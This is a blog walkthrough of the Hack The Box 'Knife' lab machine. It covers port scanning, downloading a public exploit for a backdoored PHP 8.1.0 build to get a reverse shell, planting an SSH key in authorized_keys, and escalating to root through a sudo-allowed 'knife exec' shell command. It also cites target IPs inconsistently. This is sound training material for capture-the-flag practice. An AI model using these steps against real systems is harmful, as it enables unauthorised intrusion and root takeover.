HTB: Knife

Knife Badge

Machine IP: 10.129.139.25
System IP: 10.10.16.12

One of the easiest boxes for a beginner. Just don’t overthink and look for vulnerabilities for the things you see on surface.

Let’s start with network mapper (Nmap)

nmap -A -T4 -p- -v 10.129.139.27 -oN ./nmap.txt

which output the following

Nmap scan report for 10.129.139.27
Host is up (0.26s latency).
Not shown: 65431 closed ports, 102 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80

On inspect I found that it’s running on `php 8.1.0` and with a simple google I landed on exploit.db link.

After we copied the python code to our system

wget https://www.exploit-db.com/raw/49933

then on running the exploit I provided the IP of target and boom we are inside system :)

Got the reverse shell

Inside `/home/james/user.txt` we got the user flag.

let’s check for sudo -l

Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife

but our shell isn’t stable at all so :’) we are not able to navigate properly.

So lets try doing login via ssh but as we can’t use wget so we need to echo our public key to authorized key. Note: you have to first generate the key pairs link.

echo "ssh-rsa AAA......." > ~/.ssh/authorized_keys

and then ssh from our machine

ssh -i id_rsa james@10.10.10.242

On executing

sudo /usr/bin/knife

we find this

So we can execute a script

So we have to basically create a script and execute it as root :) what on earth we want. Just execute the shell as root.

Now let’s run it to get the root shell

sudo knife exec --exec "exec '/bin/sh -i' "
root flag

So what we doing here is to execute the line /bin/sh -i as a root user since we can execute it with sudo.

Thanks for reading and stay tuned for similar writeups.

--

--

--

A very enthusiastic and learning behavior with a mentality of over-promising and over-delivering having experience working as freelance.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Top SIEM Companies

The Problem with Voice Recognition and Privacy

GlassWire Elite Crack 2.3.397+Lifetime Activation Code

GlassWire Elite Crack 2.3.397+Lifetime Activation Code

The Shifting Debate around Security Metrics

{UPDATE} Ducklings! Hack Free Resources Generator

{UPDATE} Squeezitch Hack Free Resources Generator

How to Assess and Audit DevOps Security to Improve Business Value

Tackling the IP Address Crisis: Alibaba’s Youku Leads IPv6 Adoption

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Praddyum Verma

Praddyum Verma

A very enthusiastic and learning behavior with a mentality of over-promising and over-delivering having experience working as freelance.

More from Medium

VulnHub’s Mr. Robot: A Walkthrough

Tryhackme: Basic Pentesting Walkthrough by Akash

Vulnhub: basic pentesting 1 (Walkthrough)

Advent of Cyber 2021 — [Day 2] Elf HR Problems